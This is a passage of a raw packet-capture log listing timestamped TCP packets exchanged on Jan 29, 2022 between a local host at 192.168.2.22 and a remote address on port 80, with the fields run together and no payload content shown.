                                                                                                                                                          Jan 29, 2022 00:14:50.354044914 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.354079008 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.532291889 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532332897 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532346010 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532361031 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532373905 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532392025 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532407045 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532422066 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532439947 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532455921 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532473087 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532490969 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532507896 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532525063 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532537937 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532552958 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532568932 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532583952 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.532586098 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532604933 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532623053 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532627106 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.532640934 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532658100 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532670021 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.532675028 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532692909 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532708883 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532715082 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.532727003 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532744884 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532757998 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.532762051 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532778978 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532794952 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532809019 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532815933 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.532825947 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532841921 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532856941 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532860994 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.532881021 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532897949 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532910109 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.532913923 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532915115 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.532931089 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532943010 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.532948017 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532953024 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.532967091 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532989025 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.711520910 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.711582899 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.711626053 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.711663008 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.711704969 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.711752892 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.711770058 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.711792946 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.711802959 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.711828947 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.711837053 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.711875916 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.711889982 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.711920977 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.711961985 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.711966991 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.711998940 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.712038994 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.712049961 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.712079048 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.712116957 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.712130070 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.712161064 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.712204933 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.712217093 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.712245941 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.712286949 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.712292910 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.712325096 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.712363958 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.712371111 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.712404966 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.712441921 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.712481022 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.712497950 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.712518930 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.712558985 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.712563992 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.712598085 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.712635040 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.712645054 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.712673903 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.712712049 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.712723017 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.712749004 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.712788105 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.712799072 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.712826014 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.712865114 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.712914944 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.712928057 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.712951899 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.712990999 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.713028908 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.713036060 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.713067055 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.713104963 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.713110924 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.713141918 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.713190079 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.713195086 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.713231087 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.713268995 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.713306904 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.713310003 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.713352919 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.713359118 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.713386059 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.713391066 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.713430882 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.713437080 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.891710043 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.891762972 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.891787052 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.891810894 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.891835928 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.891858101 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.891880989 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.891905069 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.891917944 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.891928911 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.891953945 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.891968012 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.891977072 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.891982079 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.891985893 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.892005920 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.892031908 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.892046928 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.892056942 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.892081976 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.892086983 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.892122030 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.892147064 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.892148018 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.892174006 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.892199039 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.892200947 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.892225027 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.892251015 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.892251015 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.892276049 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.892302036 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.892302036 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.892328024 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.892354012 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.892355919 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.892381907 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.892406940 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.892410994 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.892437935 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.892462015 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.892488956 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.892488956 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.892518044 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.892544985 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.892565012 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.892570019 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.892596960 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.892621994 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.892648935 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.892648935 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.892673969 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.892700911 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.892725945 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.892726898 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.892754078 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.892780066 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.892805099 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.892805099 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.892831087 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.892857075 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.892878056 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.892883062 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.892894030 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.892913103 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.892918110 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.892935038 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.892944098 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.892971039 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.892997026 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.071202040 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.071248055 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.071269035 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.071295023 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.071320057 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.071343899 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.071367979 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.071393013 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.071418047 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.071441889 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.071465969 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.071491003 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.071512938 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.071521997 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.071538925 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.071556091 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.071567059 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.071588993 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.071594000 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.071619987 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.071643114 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.071645021 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.071669102 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.071677923 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.071695089 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.071717978 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.071743011 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.071743965 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.071768999 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.071790934 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.071795940 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.071821928 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.071846008 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.071868896 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.071870089 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.071897030 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.071908951 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.071928024 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.071955919 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.071980000 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.072005033 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.072005987 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.072030067 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.072053909 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.072055101 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.072077990 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.072103024 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.072108030 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.072128057 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.072151899 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.072154999 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.072175980 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.072201014 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.072202921 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.072225094 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.072247982 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.072249889 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.072272062 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.072295904 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.072302103 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.072320938 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.072331905 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.072345972 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.072395086 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.250617027 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.250663996 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.250683069 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.250701904 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.250725985 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.250749111 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.250771999 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.250794888 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.250819921 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.250823021 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.250839949 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.250861883 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.250868082 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.250869036 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.250895977 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.250919104 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.250941038 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.250942945 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.250971079 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.250993967 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251008034 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.251019001 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251043081 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251065969 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251080036 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.251089096 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251111984 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251135111 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251148939 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.251158953 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251182079 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251207113 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251220942 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.251230001 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251255989 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251276970 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251291037 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.251298904 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251322031 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251342058 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251359940 CET4916880192.168.2.22103.206.244.105
